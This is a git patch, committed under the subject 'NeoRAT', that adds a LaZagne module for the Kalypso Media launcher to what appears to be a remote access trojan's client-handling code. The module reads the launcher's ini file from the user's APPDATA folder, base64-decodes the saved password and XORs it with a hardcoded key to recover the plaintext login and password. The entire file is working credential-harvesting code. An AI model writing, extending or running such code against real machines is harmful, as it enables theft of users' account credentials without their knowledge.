From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001 From: AL-LCL Date: Fri, 19 May 2023 11:01:49 +0200 Subject: NeoRAT --- .../lazagne/softwares/games/kalypsomedia.py | 42 ++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 foreign/client_handling/lazagne/softwares/games/kalypsomedia.py (limited to 'foreign/client_handling/lazagne/softwares/games/kalypsomedia.py') diff --git a/foreign/client_handling/lazagne/softwares/games/kalypsomedia.py b/foreign/client_handling/lazagne/softwares/games/kalypsomedia.py new file mode 100644 index 0000000..566aba7 --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/games/kalypsomedia.py @@ -0,0 +1,42 @@ +# -*- coding: utf-8 -*- +import base64 +import os + +from foreign.client_handling.lazagne.config.constant import constant +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.winstructure import char_to_int, chr_or_byte + +try: + from ConfigParser import ConfigParser # Python 2.7 +except ImportError: + from configparser import ConfigParser # Python 3 + + +class KalypsoMedia(ModuleInfo): + def __init__(self): + ModuleInfo.__init__(self, 'kalypsomedia', 'games') + + def xorstring(self, s, k): + """ + xors the two strings + """ + return b''.join(chr_or_byte(char_to_int(x) ^ char_to_int(y)) for x, y in zip(s, k)) + + def run(self): + creds = [] + key = b'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89' + inifile = os.path.join(constant.profile['APPDATA'], u'Kalypso Media\\Launcher\\launcher.ini') + + # The actual user details are stored in *.userdata files + if os.path.exists(inifile): + config = ConfigParser() + config.read(inifile) + + # get the encoded password + cookedpw = base64.b64decode(config.get('styx user', 'password')) + + creds.append({ + 'Login': config.get('styx user', 'login'), + 'Password': self.xorstring(cookedpw, key) + }) + return creds -- cgit v1.2.3